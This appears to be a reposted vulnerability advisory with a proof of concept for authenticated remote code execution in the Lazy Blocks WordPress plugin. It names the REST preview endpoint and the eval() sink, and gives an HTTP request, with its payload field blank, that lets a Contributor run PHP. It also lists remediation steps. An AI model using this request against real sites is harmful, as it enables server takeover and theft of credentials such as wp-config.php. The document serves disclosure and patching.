Share
## https://sploitus.com/exploit?id=E4E6DF5A-3218-54BA-AD8A-7C36C028663E
# CVE-2026-XXXX – Authenticated Remote Code Execution in Lazy Blocks ≤ 4.2.0

**Researcher**: ZeYrOXxx  
**Plugin**: Lazy Blocks (WordPress)  
**Affected Versions**: ≤ 4.2.0  
**Severity**: Critical  
**Vulnerability Type**: Authenticated Remote Code Execution (RCE)  
**Attack Vector**: REST API  
**Required Privilege**: edit_posts (Contributor+)  

---

## Executive Summary

A critical security vulnerability was identified in the Lazy Blocks WordPress plugin affecting versions up to and including **4.2.0**.  
The vulnerability allows authenticated users with low privileges (Contributor role) to execute **arbitrary PHP code** on the server via a REST API endpoint intended for block preview functionality.

This issue completely breaks WordPress’ privilege model and may lead to **full server compromise**.

---

## Vulnerable Endpoint

```
POST /wp-json/lazy-blocks/v1/block-builder-preview/
```

The endpoint is accessible to any authenticated user with the `edit_posts` capability.

---

## Technical Details

### Permission Check

The REST route is registered with a weak permission callback:

```php
'permission_callback' => array( $this, 'block_builder_preview_permission' )
```

This includes Contributors, who should never be allowed to execute PHP code.

---

### Vulnerable Code Path

**REST Controller – `classes/class-rest.php`**
```php
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);
```

**Block Renderer – `classes/class-blocks.php`**
```php
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}
```

The `eval()` function executes attacker-controlled PHP code without sanitization or validation.

---

## Root Cause Analysis

Lazy Blocks allows custom PHP rendering logic for blocks.  
The REST API preview endpoint accepts **user-supplied block definitions** and does not distinguish between trusted stored blocks and attacker-controlled preview blocks.

By injecting flattened block attributes such as:

- `code_output_method`
- `code_editor_html`

an attacker can reach the `php_eval()` execution sink and run arbitrary PHP code.

---

## Proof of Concept (HTTP)

### Request

```http
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: target.site
Content-Type: application/json
Authorization: Basic 

{
  "context": "editor",
  "block": {
    "slug": "exploit",
    "code_output_method": "php",
    "code_editor_html": ""
  }
}
```

### Response

```html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

✔ Arbitrary command execution confirmed

---


This PoC is provided strictly for **security testing and research purposes**.

---

## Impact

An attacker with Contributor access can:

- Execute arbitrary system commands
- Read sensitive files (e.g., `wp-config.php`)
- Modify PHP source files
- Escalate privileges to administrator
- Fully compromise the WordPress instance

---

## Remediation

- Restrict PHP rendering to administrators only
- Remove usage of `eval()` on user-controlled input
- Prevent REST preview of blocks containing PHP code
- Require `manage_options` or `unfiltered_html` capability
- Replace PHP execution with safe templating mechanisms

---